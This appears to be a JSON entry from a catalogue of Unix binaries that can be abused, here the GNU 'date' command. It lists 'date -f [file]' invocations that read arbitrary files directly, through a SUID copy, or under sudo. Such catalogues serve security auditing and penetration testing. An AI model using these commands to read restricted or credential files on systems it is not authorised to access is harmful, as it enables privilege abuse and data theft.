You cannot select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

20 lines
433 B
JSON

{
"description": "Each line is corrupted by a prefix string and wrapped inside quotes, so this may not be suitable for binary files. This only works for the GNU variant of 'date'.",
"functions": {
"file-read": [
{
"code": "date -f [file]\n"
}
],
"suid": [
{
"code": "./date -f [file]\n"
}
],
"sudo": [
{
"code": "sudo date -f [file]\n"
}
]
}
}